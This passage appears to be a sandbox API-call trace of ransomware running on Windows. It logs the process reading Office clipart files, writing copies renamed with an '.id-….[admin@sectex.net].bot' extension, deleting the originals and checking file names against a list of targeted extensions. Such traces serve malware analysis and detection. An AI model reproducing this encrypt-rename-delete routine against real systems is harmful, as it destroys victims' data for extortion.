	[0147.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.413] GetLastError () returned 0x0
	[0147.413] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xa4c, lpOverlapped=0x0) returned 1
	[0147.474] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xa50, lpOverlapped=0x0) returned 1
	[0147.475] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.475] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.475] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.475] CloseHandle (hObject=0x3b8) returned 1
	[0147.475] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.476] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.477] CloseHandle (hObject=0x3ac) returned 1
	[0147.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.554] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02141_.wmf")) returned 1
	[0147.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.555] lstrlenW (lpString=".doc") returned 4
	[0147.555] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.555] lstrlenW (lpString=".docx") returned 5
	[0147.555] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.555] lstrlenW (lpString=".pdf") returned 4
	[0147.555] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.555] lstrlenW (lpString=".xls") returned 4
	[0147.555] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.555] lstrlenW (lpString=".xlsx") returned 5
	[0147.555] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.555] lstrlenW (lpString=".ppt") returned 4
	[0147.555] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.555] lstrlenW (lpString=".zip") returned 4
	[0147.555] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.555] lstrlenW (lpString=".rar") returned 4
	[0147.555] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.555] lstrlenW (lpString=".bz2") returned 4
	[0147.555] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.555] lstrlenW (lpString=".7z") returned 3
	[0147.555] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.555] lstrlenW (lpString=".dbf") returned 4
	[0147.555] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.555] lstrlenW (lpString=".1cd") returned 4
	[0147.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.556] lstrlenW (lpString=".jpg") returned 4
	[0147.556] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.556] lstrlenW (lpString=".doc") returned 4
	[0147.556] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString=".docx") returned 5
	[0147.556] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.556] lstrlenW (lpString=".pdf") returned 4
	[0147.556] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString=".xls") returned 4
	[0147.556] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.556] lstrlenW (lpString=".xlsx") returned 5
	[0147.556] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.556] lstrlenW (lpString=".ppt") returned 4
	[0147.556] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.556] lstrlenW (lpString=".zip") returned 4
	[0147.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.556] lstrlenW (lpString=".rar") returned 4
	[0147.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString=".bz2") returned 4
	[0147.556] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString=".7z") returned 3
	[0147.556] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.556] lstrlenW (lpString=".dbf") returned 4
	[0147.556] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.556] lstrlenW (lpString=".1cd") returned 4
	[0147.557] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 63
	[0147.557] lstrlenW (lpString=".jpg") returned 4
	[0147.557] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.557] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.557] lstrlenW (lpString="HH00260_.WMF") returned 12
	[0147.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.600] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3662) returned 1
	[0147.600] CloseHandle (hObject=0x398) returned 1
	[0147.600] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf")) returned 0x20
	[0147.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.633] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.633] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.634] GetLastError () returned 0x0
	[0147.634] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xe4e, lpOverlapped=0x0) returned 1
	[0147.702] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xe50, lpOverlapped=0x0) returned 1
	[0147.703] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.703] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.703] SetEndOfFile (hFile=0x398) returned 1
	[0147.703] CloseHandle (hObject=0x398) returned 1
	[0147.703] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.703] SetEndOfFile (hFile=0x3ac) returned 1
	[0147.705] CloseHandle (hObject=0x3ac) returned 1
	[0147.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.706] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00260_.wmf")) returned 1
	[0147.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.706] lstrlenW (lpString=".doc") returned 4
	[0147.706] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.706] lstrlenW (lpString=".docx") returned 5
	[0147.706] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.706] lstrlenW (lpString=".pdf") returned 4
	[0147.706] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.706] lstrlenW (lpString=".xls") returned 4
	[0147.706] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.706] lstrlenW (lpString=".xlsx") returned 5
	[0147.706] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.707] lstrlenW (lpString=".ppt") returned 4
	[0147.707] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.707] lstrlenW (lpString=".zip") returned 4
	[0147.707] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.707] lstrlenW (lpString=".rar") returned 4
	[0147.707] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString=".bz2") returned 4
	[0147.707] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString=".7z") returned 3
	[0147.707] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.707] lstrlenW (lpString=".dbf") returned 4
	[0147.707] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.707] lstrlenW (lpString=".1cd") returned 4
	[0147.707] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.707] lstrlenW (lpString=".jpg") returned 4
	[0147.707] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.707] lstrlenW (lpString=".doc") returned 4
	[0147.707] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString=".docx") returned 5
	[0147.707] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.707] lstrlenW (lpString=".pdf") returned 4
	[0147.707] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.707] lstrlenW (lpString=".xls") returned 4
	[0147.707] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.707] lstrlenW (lpString=".xlsx") returned 5
	[0147.707] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.708] lstrlenW (lpString=".ppt") returned 4
	[0147.708] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.708] lstrlenW (lpString=".zip") returned 4
	[0147.708] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.708] lstrlenW (lpString=".rar") returned 4
	[0147.708] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.708] lstrlenW (lpString=".bz2") returned 4
	[0147.708] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.708] lstrlenW (lpString=".7z") returned 3
	[0147.708] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.708] lstrlenW (lpString=".dbf") returned 4
	[0147.708] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.708] lstrlenW (lpString=".1cd") returned 4
	[0147.708] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00260_.WMF") returned 63
	[0147.708] lstrlenW (lpString=".jpg") returned 4
	[0147.708] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.709] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.709] lstrlenW (lpString="HH00527_.WMF") returned 12
	[0147.709] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0147.814] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5798) returned 1
	[0147.814] CloseHandle (hObject=0x3a0) returned 1
	[0147.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf")) returned 0x20
	[0147.866] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.867] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.867] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.868] GetLastError () returned 0x0
	[0147.868] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x16a6, lpOverlapped=0x0) returned 1
	[0147.899] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x16b0, lpOverlapped=0x0) returned 1
	[0147.899] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.900] WriteFile (in: hFile=0x31c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.900] SetEndOfFile (hFile=0x31c) returned 1
	[0147.900] CloseHandle (hObject=0x31c) returned 1
	[0147.900] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.900] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.902] CloseHandle (hObject=0x3b8) returned 1
	[0147.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.902] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00527_.wmf")) returned 1
	[0147.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.903] lstrlenW (lpString=".doc") returned 4
	[0147.903] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.903] lstrlenW (lpString=".docx") returned 5
	[0147.903] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.903] lstrlenW (lpString=".pdf") returned 4
	[0147.903] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.903] lstrlenW (lpString=".xls") returned 4
	[0147.903] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.903] lstrlenW (lpString=".xlsx") returned 5
	[0147.903] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.903] lstrlenW (lpString=".ppt") returned 4
	[0147.903] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.903] lstrlenW (lpString=".zip") returned 4
	[0147.903] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.903] lstrlenW (lpString=".rar") returned 4
	[0147.903] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.903] lstrlenW (lpString=".bz2") returned 4
	[0147.903] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.903] lstrlenW (lpString=".7z") returned 3
	[0147.903] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.904] lstrlenW (lpString=".dbf") returned 4
	[0147.904] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.904] lstrlenW (lpString=".1cd") returned 4
	[0147.904] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.904] lstrlenW (lpString=".jpg") returned 4
	[0147.904] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.904] lstrlenW (lpString=".doc") returned 4
	[0147.904] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString=".docx") returned 5
	[0147.904] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.904] lstrlenW (lpString=".pdf") returned 4
	[0147.904] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString=".xls") returned 4
	[0147.904] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.904] lstrlenW (lpString=".xlsx") returned 5
	[0147.904] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.904] lstrlenW (lpString=".ppt") returned 4
	[0147.904] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.904] lstrlenW (lpString=".zip") returned 4
	[0147.904] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.904] lstrlenW (lpString=".rar") returned 4
	[0147.904] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.904] lstrlenW (lpString=".bz2") returned 4
	[0147.904] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.905] lstrlenW (lpString=".7z") returned 3
	[0147.905] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.905] lstrlenW (lpString=".dbf") returned 4
	[0147.905] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.905] lstrlenW (lpString=".1cd") returned 4
	[0147.905] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.905] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 63
	[0147.905] lstrlenW (lpString=".jpg") returned 4
	[0147.905] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.905] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.905] lstrlenW (lpString="HH00669_.WMF") returned 12
	[0147.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.947] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11490) returned 1
	[0147.947] CloseHandle (hObject=0x3c8) returned 1
	[0147.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf")) returned 0x20
	[0147.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.948] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.948] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
